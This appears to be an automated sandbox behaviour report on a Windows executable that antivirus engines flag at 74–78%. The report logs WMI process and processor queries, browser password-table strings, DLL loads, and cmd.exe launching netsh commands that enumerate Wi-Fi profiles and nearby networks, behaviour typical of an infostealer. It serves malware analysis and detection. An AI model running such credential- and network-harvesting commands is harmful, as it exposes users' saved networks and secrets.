Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

File read: C:\Users\user\Pictures\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp37BB.tmp.dat.3.dr, tmp3757.tmp.dat.3.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FUEvp5c8lO.exe	Virustotal: Detection: 74%
Source: FUEvp5c8lO.exe	ReversingLabs: Detection: 78%

Source: unknown	Process created: C:\Users\user\Desktop\FUEvp5c8lO.exe "C:\Users\user\Desktop\FUEvp5c8lO.exe"
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Users\user\Desktop\FUEvp5c8lO.exe "C:\Users\user\Desktop\FUEvp5c8lO.exe"
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Users\user\Desktop\FUEvp5c8lO.exe "C:\Users\user\Desktop\FUEvp5c8lO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
